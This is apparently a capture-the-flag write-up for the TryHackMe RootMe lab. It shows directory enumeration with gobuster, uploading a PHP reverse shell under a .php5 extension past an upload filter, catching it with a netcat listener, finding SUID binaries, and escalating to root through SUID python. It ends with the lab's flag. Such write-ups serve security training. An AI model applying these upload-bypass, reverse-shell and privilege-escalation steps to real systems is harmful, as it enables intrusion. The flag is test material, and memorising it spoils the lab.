MiaadZ (S3Z4R)

Offensive Security
Penetration Testing
Top 7% @ TryHackMe

CTF Writeup: RootMe

OS Difficulty Gobuster Netcat Python Find

Link: TryHackMe | OS: Linux | Difficulty: Easy | Date: 2025-11-08 | Author: S3Z4R

1. Reconnaissance

gobuster dir -u http://<Machine-IP>/ -w /usr/share/wordlists/dirb/common.txt -q -t 25 -x php,html,txt

/css (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

We need the /panel which is a file upload page.

2. Initial Access

Exploitation

We can create a reverse shell using PentestMonkey and upload with the .php5 extension. Then open the file on the following url while opening your netcat.

nc -lnvp 1234

rootme.thm/uploads/php-reverse-shell.php5

Find SUID Binaries

Search for files with the SUID bit set.

find / -type f -perm -4000 2>/dev/null

Or, using the THM hint (finding files owned by root with the SUID bit):

find / -user root -perm /4000

3. Priviledge Escalation

We can exploit the following SUID binary:

/usr/bin/python2.7

Run the following command to gain a shell:

python -c 'import os; os.system("/bin/sh")'

4. Flag

THM{pr1v1l3g3_3sc4l4t10n}